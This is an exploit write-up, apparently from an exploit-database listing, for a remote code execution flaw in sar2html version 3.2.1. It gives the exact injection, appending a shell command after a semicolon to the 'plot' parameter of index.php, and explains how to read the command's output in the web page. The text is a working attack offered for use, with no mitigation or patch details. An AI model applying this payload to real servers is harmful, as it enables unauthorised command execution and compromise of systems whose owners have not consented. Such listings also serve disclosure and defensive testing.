13 lines
No EOL
521 B
Text
13 lines
No EOL
521 B
Text
# Exploit Title: sar2html Remote Code Execution
|
|
# Date: 01/08/2019
|
|
# Exploit Author: Furkan KAYAPINAR
|
|
# Vendor Homepage:https://github.com/cemtan/sar2html
|
|
# Software Link: https://sourceforge.net/projects/sar2html/
|
|
# Version: 3.2.1
|
|
# Tested on: Centos 7
|
|
|
|
In web application you will see index.php?plot url extension.
|
|
|
|
http://<ipaddr>/index.php?plot=;<command-here> will execute
|
|
the command you entered. After command injection press "select # host" then your command's
|
|
output will appear bottom side of the scroll screen. |